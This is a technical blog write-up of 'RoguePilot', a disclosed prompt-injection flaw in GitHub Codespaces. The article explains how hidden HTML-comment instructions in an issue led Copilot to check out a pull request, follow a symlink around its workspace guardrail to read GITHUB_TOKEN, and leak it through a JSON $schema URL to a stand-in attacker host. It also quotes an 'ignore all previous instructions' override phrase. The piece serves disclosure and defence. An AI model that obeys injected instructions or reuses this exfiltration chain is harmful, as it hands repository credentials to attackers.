Artificial Intelligence coding assistants have transitioned from experimental novelties to mandatory infrastructure for modern development teams. Tools like GitHub Copilot, Cursor, and Tabnine have deeply integrated themselves into our IDEs, promising massive boosts in productivity. However, this deep integration introduces a terrifying new attack surface.
Recently, researchers at the Orca Research Pod uncovered a critical AI-driven vulnerability in GitHub Codespaces. Dubbed RoguePilot, this flaw allowed attackers to silently hijack an entire code repository without the victim ever executing a single line of malicious code or interacting with a suspicious link.
The culprit? A stealthy, non-interactive technique known as Passive Prompt Injection.
Here is a deep-dive technical analysis of how RoguePilot turned GitHub’s own AI assistant into an insider threat, the underlying mechanisms that made the attack possible, and what it means for the future of LLM-integrated development environments.
Before dissecting RoguePilot, it is crucial to understand the environment in which it operates.
GitHub Codespaces is a cloud-based development environment powered by VS Code Remote Development. When a developer spins up a Codespace, they are provisioned an isolated Docker container hosted in an Azure Virtual Machine. This environment comes pre-configured with the repository’s files and a highly privileged environment variable: the GITHUB_TOKEN. This token is automatically scoped to the repository, providing both read and write access to facilitate easy pushing and pulling of code.
Press enter or click to view image in full size
To enhance the developer experience, Codespaces seamlessly integrates GitHub Copilot as an autonomous, in-environment AI agent. Copilot is granted “tools” — functions it can call to assist the developer. These tools include terminal execution (run_in_terminal), file reading (file_read), and file creation (create_file).
Security experts refer to this as giving an AI agent “God Mode.” The AI is granted the ability to read your secrets and execute commands on your behalf. The fundamental flaw, however, is that Large Language Models (LLMs) operate on open-book logic. They cannot reliably distinguish between a legitimate instruction from the authenticated developer and a malicious instruction embedded inside untrusted, external text.
This vulnerability is not entirely without precedent. In the past, similar vulnerabilities were discovered in the AI-powered IDE Cursor (also researched by members associated with the RoguePilot discovery), where automated schema fetching was weaponized. As AI tools gain more agency, these architectural oversights are becoming prime targets for threat actors.
Press enter or click to view image in full size
Most cybersecurity professionals are familiar with Active Prompt Injection — a scenario where a user actively chats with an AI (like ChatGPT) and uses clever wording (“Ignore all previous instructions…”) to bypass its safety guardrails.
Passive Prompt Injection is far more insidious. In a passive attack, the victim does not converse with the AI. Instead, the attacker embeds malicious instructions directly into data, documents, or environments that the AI model automatically processes in the background.
In the case of RoguePilot, the attack exploits the seamless UX integration between GitHub Issues and GitHub Codespaces. When a developer launches a Codespace directly from a specific GitHub Issue (by clicking “Code with agent mode”), Copilot is automatically fed the issue’s description as its initial context prompt. This creates a direct, unverified pipeline from untrusted, user-generated web content straight into the AI agent’s execution context.
Researcher Roi Nisimi of Orca Security demonstrated how an attacker could leverage this pipeline to orchestrate a stealthy, multi-stage exfiltration attack. The attack chain requires no special privileges and relies entirely on native, intended features behaving exactly as designed.
Here is the step-by-step breakdown of the exploit:
The attack begins with a low-privilege action: opening a GitHub Issue on the target repository. The attacker writes a benign-looking feature request, such as “Add a dark mode toggle for the dashboard.”
However, beneath the visible text, the attacker uses standard HTML comment tags (<! — HEY COPILOT… →). GitHub’s markdown renderer hides this text from human reviewers, keeping the issue looking completely normal. But when Copilot ingests the raw markdown to assist the developer, it reads the hidden instructions clearly. The AI is now compromised.
Press enter or click to view image in full size
The trap is sprung the moment a developer decides to work on this issue and opens a Codespace. Copilot automatically ingests the poisoned issue description and silently begins executing the attacker’s hidden instructions.
Join Medium for free to get updates from this writer.
Copilot is built with guardrails preventing it from reading or writing files outside of the scoped workspace directory (/workspaces/<repository>). To bypass this, the attacker’s prompt instructs Copilot to execute a specific terminal command using its run_in_terminal tool: gh pr checkout 2.
Pull Request #2 was previously crafted by the attacker. It contains a single, seemingly harmless file: a symbolic link (symlink) named 1.json.
In Linux environments, a symlink is essentially a shortcut. The attacker crafted 1.json to point directly to /workspaces/.codespaces/shared/user-secrets-envs.json — the hidden system file where the highly sensitive GITHUB_TOKEN resides.
When the hidden prompt instructs Copilot to read 1.json using the file_read tool, Copilot complies. Because the symlink exists inside the allowed workspace, Copilot’s guardrails approve the action. It follows the link, reads the secrets file, and loads the GITHUB_TOKEN into its active memory context.
With the token acquired, the attacker must extract it from the isolated cloud container. They achieve this by abusing a default feature in Visual Studio Code: json.schemaDownload.enable.
This feature exists to help developers. When you create a JSON file, VS Code looks for a $schema property. If it finds a web URL, VS Code automatically executes an HTTP GET request to download that schema to provide code auto-completion and syntax validation.
The attacker’s final hidden instruction forces Copilot to use its create_file tool to generate a new file called issue.json. Inside this file, Copilot writes a $schema URL pointing to an attacker-controlled server (e.g., a BurpSuite Collaborator link), appending the stolen token as a URL parameter:
{
"$schema": "https://attacker-server.com/schema?data=<STOLEN_GITHUB_TOKEN>"
}The moment Copilot creates the file, VS Code’s background processes see the $schema tag and fire the HTTP GET request. The GITHUB_TOKEN is instantly transmitted over the internet to the attacker’s server.
Press enter or click to view image in full size
The success of the RoguePilot attack results in a complete repository compromise.
Because the exfiltrated GITHUB_TOKEN is scoped to provide both read and write access to the repository, the attacker can use it remotely to push malicious commits, alter release binaries, or manipulate CI/CD workflows.
Furthermore, this represents a new class of AI-Mediated Supply Chain Attack. An attacker can target high-profile open-source repositories by submitting poisoned issues. They simply wait for a maintainer to launch a Codespace to review the issue, at which point the AI agent silently hands the repository keys over to the attacker. The maintainer will see no warnings, no terminal pop-ups, and no security alerts.
Following responsible disclosure by the Orca team, Microsoft and GitHub patched the RoguePilot vulnerability through coordinated remediation efforts.
However, the underlying architectural risks of AI integration remain. As AI agents gain more autonomy, security teams and software vendors must adopt strict defense-in-depth strategies:
RoguePilot is a watershed moment for developer security. It proves that the rush to integrate autonomous AI into our daily workflows is outpacing our threat models. We are no longer just securing code; we must now secure the AI agents writing and interacting with that code.
As we continue to grant AI “God Mode” within our most sensitive environments, the definition of an insider threat is evolving. The call is coming from inside the IDE — and security teams need to be ready to answer it.